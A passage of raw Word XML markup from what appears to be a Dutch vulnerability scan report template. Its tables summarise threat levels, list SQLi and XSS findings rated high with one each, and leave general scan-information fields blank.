AATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhACOyauHXAAAAlAEA&#10;AAsAAAAAAAAAAAAAAAAALAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAGjlz9B7AgAAZgUA&#10;AA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAIAork3gAAAA&#10;CwEAAA8AAAAAAAAAAAAAAAAA0wQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADgBQAA&#10;AAA=&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="551967DA" w14:textId="36BE9F29" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00137993">
                      <w:pPr>
                        <w:ind w:firstLine="708"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="001D7501">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Dreiginsniveau</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="11036D19" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00137993">
                      <w:pPr>
                        <w:ind w:firstLine="708"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="4B7D0C6B" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00137993">
                      <w:pPr>
                        <w:ind w:firstLine="708"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="17524D23" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00137993">
                      <w:pPr>
                        <w:ind w:firstLine="708"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:tbl>
                      <w:tblPr>
                        <w:tblStyle w:val="GridTable2-Accent3"/>
                        <w:tblW w:w="0" w:type="auto"/>
                        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
                      </w:tblPr>
                      <w:tblGrid>
                        <w:gridCol w:w="4302"/>
                        <w:gridCol w:w="4300"/>
                      </w:tblGrid>
                      <w:tr w:rsidR="00CE4BB5" w14:paraId="6424DE1A" w14:textId="77777777" w:rsidTr="00E17A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78E77FF5" w14:textId="41B6FCEA" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00137993">
                            <w:pPr>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Totale</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>dreigementen</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>gevonden</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr w:rsidR="00CE4BB5" w14:paraId="04D49B39"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75696E46" w14:textId="6C0CFEF4" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00137993">
                            <w:pPr>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Hoog</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="4300" w:type="dxa"/>
                          </w:tcPr>
                          <w:p w14:paraId="68B863AC" w14:textId="42640D64" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5"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2</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr w:rsidR="00CE4BB5" w14:paraId="4D7652D7" w14:textId="77777777" w:rsidTr="00E17A29">
                        <w:tc>
                          <w:tcPr>
                            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                            <w:tcW w:w="4302" w:type="dxa"/>
                          </w:tcPr>
                          <w:p w14:paraId="6B539619" w14:textId="2AF12018" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00137993">
                            <w:pPr>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Gemiddeld</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="4300" w:type="dxa"/>
                          </w:tcPr>
                          <w:p w14:paraId="00B2265C" w14:textId="1BA63B58" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00137993">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0</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr w:rsidR="00CE4BB5" w14:paraId="26E363CD"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4F54DD85" w14:textId="7F690E6F" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00137993">
                            <w:pPr>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Laag</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="4300" w:type="dxa"/>
                          </w:tcPr>
                          <w:p w14:paraId="05C30D57" w14:textId="604A18B2" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5"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0</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                      </w:tr>
                    </w:tbl>
                    <w:p w14:paraId="415B2DEE" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005A7A65">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:tbl>
                      <w:tblPr>
                        <w:tblStyle w:val="GridTable2-Accent3"/>
                        <w:tblW w:w="0" w:type="auto"/>
                        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
                      </w:tblPr>
                      <w:tblGrid>
                        <w:gridCol w:w="3038"/>
                        <w:gridCol w:w="3116"/>
                        <w:gridCol w:w="2458"/>
                      </w:tblGrid>
                      <w:tr w:rsidR="00CE4BB5" w14:paraId="5679F026" w14:textId="7FF416C1" w:rsidTr="00F21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29842537" w14:textId="13629C35" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005A7A65">
                            <w:pPr>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Categorie</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>dreigementen</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="3118" w:type="dxa"/>
                          </w:tcPr>
                          <w:p w14:paraId="4D9489DE" w14:textId="207F4D5A" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005A7A65">
                            <w:pPr>
                              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Dreigingsniveau</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="2460" w:type="dxa"/>
                          </w:tcPr>
                          <w:p w14:paraId="5219E4C5" w14:textId="548FBE28" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005A7A65">
                            <w:pPr>
                              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Aantal</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr w:rsidR="00CE4BB5" w14:paraId="49B0474F" w14:textId="466A40BE" w:rsidTr="00F21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1EFECE3A" w14:textId="490F5FCA" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005A7A65">
                            <w:pPr>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>SQLi</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="3118" w:type="dxa"/>
                          </w:tcPr>
                          <w:p w14:paraId="303A5A8B" w14:textId="1F97E029" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005A7A65">
                            <w:pPr>
                              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Hoog</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="2460" w:type="dxa"/>
                          </w:tcPr>
                          <w:p w14:paraId="7542976E" w14:textId="297EDB86" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005A7A65">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1</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr w:rsidR="00CE4BB5" w14:paraId="3333A98F" w14:textId="16B85212" w:rsidTr="00F21CF7">
                        <w:tc>
                          <w:tcPr>
                            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                            <w:tcW w:w="3039" w:type="dxa"/>
                          </w:tcPr>
                          <w:p w14:paraId="0AAC801D" w14:textId="6DDAAD9C" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005A7A65">
                            <w:pPr>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>XSS</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="3118" w:type="dxa"/>
                          </w:tcPr>
                          <w:p w14:paraId="16BB86EB" w14:textId="794322B8" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005A7A65">
                            <w:pPr>
                              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Hoog</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="2460" w:type="dxa"/>
                          </w:tcPr>
                          <w:p w14:paraId="383140CD" w14:textId="02B8791A" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005A7A65">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1</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                      </w:tr>
                    </w:tbl>
                    <w:p w14:paraId="2C214068" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005A7A65">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="51799B0D" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="001D7501" w:rsidRDefault="00CE4BB5" w:rsidP="005A7A65">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008E476E" w:rsidRPr="00A962C1">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252019712" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="230D98CB" wp14:editId="5C05BA5B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-72390</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>362585</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5651500" cy="1336040"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="532" name="Text Box 532"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5651500" cy="1336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ListTable6Colorful-Accent3"/>
                              <w:tblW w:w="0" w:type="auto"/>
                              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
                            </w:tblPr>
                            <w:tblGrid>
                              <w:gridCol w:w="4301"/>
                              <w:gridCol w:w="4301"/>
                            </w:tblGrid>
                            <w:tr w:rsidR="00CE4BB5" w14:paraId="77C3248A" w14:textId="77777777" w:rsidTr="001379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273001D6" w14:textId="4C9C1179" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:r>
                                    <w:t>Algemene informatie</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr w:rsidR="00CE4BB5" w14:paraId="5A213CD9"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145DAC02" w14:textId="1A5726B3" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:r>
                                    <w:t>Start tijd</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="4301" w:type="dxa"/>
                                </w:tcPr>
                                <w:p w14:paraId="689C9587" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:pPr>
                                    <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                                  </w:pPr>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr w:rsidR="00CE4BB5" w14:paraId="3EEAFBDF"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82844BF" w14:textId="1C746F68" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:proofErr w:type="gramStart"/>
                                  <w:r>
                                    <w:t>Eind tijd</w:t>
                                  </w:r>
                                  <w:proofErr w:type="gramEnd"/>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="4301" w:type="dxa"/>
                                </w:tcPr>
                                <w:p w14:paraId="4BE22D27" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:pPr>
                                    <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                                  </w:pPr>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr w:rsidR="00CE4BB5" w14:paraId="41CCB9AE"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57CD7785" w14:textId="39E29C1C" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:r>
                                    <w:t>Scan tijd</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="4301" w:type="dxa"/>
                                </w:tcPr>
                                <w:p w14:paraId="006F1D89" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:pPr>
                                    <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                                  </w:pPr>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr w:rsidR="00CE4BB5" w14:paraId="7D1AE873"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65FC28CB" w14:textId="458BA1E8" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:r>
                                    <w:t>Profiel</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="4301" w:type="dxa"/>
                                </w:tcPr>
                                <w:p w14:paraId="15B5DE39" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:pPr>
                                    <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                                  </w:pPr>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr w:rsidR="00CE4BB5" w14:paraId="7EA7A113"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6E2DA85D" w14:textId="7FDB3F3F" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:r>
                                    <w:t>URL</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="4301" w:type="dxa"/>
                                </w:tcPr>
                                <w:p w14:paraId="68A0DF69" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:pPr>
                                    <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                                  </w:pPr>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr w:rsidR="00CE4BB5" w14:paraId="299EEE57"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20A6A62" w14:textId="3D390C41" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:r>
                                    <w:t xml:space="preserve">Server </w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="4301" w:type="dxa"/>
                                </w:tcPr>
                                <w:p w14:paraId="24A002FA" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:pPr>
                                    <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                                  </w:pPr>
                                </w:p>
                              </w:tc>
                            </w:tr>
                          </w:tbl>
                          <w:p w14:paraId="580CEE11" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4B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0D98CB" id="Text Box 532" o:spid="_x0000_s1104" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-5.7pt;margin-top:28.55pt;width:445pt;height:105.2pt;z-index:252019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oBTnwCAABmBQAADgAAAGRycy9lMm9Eb2MueG1srFRbT9swFH6ftP9g+X2kLZRtFSnqQEyTEKDB&#10;xLPr2DSa4+PZbpPu1++zk5aO7YVpL8nxOd+5X87Ou8awjfKhJlvy8dGIM2UlVbV9Kvm3h6t3HzgL&#10;UdhKGLKq5FsV+Pn87Zuz1s3UhFZkKuUZjNgwa13JVzG6WVEEuVKNCEfklIVQk29ExNM/FZUXLaw3&#10;ppiMRqdFS75ynqQKAdzLXsjn2b7WSsZbrYOKzJQcscX89fm7TN9ifiZmT164VS2HMMQ/RNGI2sLp&#10;3tSliIKtff2HqaaWngLpeCSpKUjrWqqcA7IZj15kc78STuVcUJzg9mUK/8+svNnceVZXJZ8eTziz&#10;okGTHlQX2SfqWOKhQq0LMwDvHaCxgwCd3vEDmCnxTvsm/ZESgxy13u7rm8xJMKen0/F0BJGEbHx8&#10;fDo6yR0ontWdD/GzooYlouQeDcx1FZvrEBEKoDtI8mbpqjYmN9HY3xgA9hyVp2DQTpn0EWcqbo1K&#10;WsZ+VRpVyIEnRp4/dWE82whMjpBS2ZhzznaBTigN369RHPBJtY/qNcp7jeyZbNwrN7Uln6v0Iuzq&#10;+y5k3eNRv4O8Exm7ZZfb/37f0SVVWzTaU78swcmrGs24FiHeCY/tQAOx8fEWH22oLTkNFGcr8j//&#10;xk94DC2knLXYtpKHH2vhFWfmi8U4fxyfYBRYzI+T6fsJHv5QsjyU2HVzQWjLGLfFyUwmfDQ7Untq&#10;HnEYFskrRMJK+C553JEXsb8BOCxSLRYZhIV0Il7beyeT6VTmNGoP3aPwbpjHiFG+od1eitmLseyx&#10;SdPSYh1J13lmU6H7qg4NwDLnUR4OT7oWh++Mej6P818AAAD//wMAUEsDBBQABgAIAAAAIQDmZYU4&#10;3wAAAAoBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/LTsMwEEX3SPyDNUjsWjtV8yBkUiEQWxDlIbFz&#10;42kSEY+j2G3C32NWsBzdo3vPVLvFDuJMk+8dIyRrBYK4cabnFuHt9XFVgPBBs9GDY0L4Jg+7+vKi&#10;0qVxM7/QeR9aEUvYlxqhC2EspfRNR1b7tRuJY3Z0k9UhnlMrzaTnWG4HuVEqk1b3HBc6PdJ9R83X&#10;/mQR3p+Onx9b9dw+2HSc3aIk2xuJeH213N2CCLSEPxh+9aM61NHp4E5svBgQVkmyjShCmicgIlDk&#10;RQbigLDJ8hRkXcn/L9Q/AAAA//8DAFBLAQItABQABgAIAAAAIQDkmcPA+wAAAOEBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhACOyauHXAAAAlAEA&#10;AAsAAAAAAAAAAAAAAAAALAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFoaAU58AgAAZgUA&#10;AA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAOZlhTjfAAAA&#10;CgEAAA8AAAAAAAAAAAAAAAAA1AQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADgBQAA&#10;AAA=&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:tbl>
                      <w:tblPr>
                        <w:tblStyle w:val="ListTable6Colorful-Accent3"/>
                        <w:tblW w:w="0" w:type="auto"/>
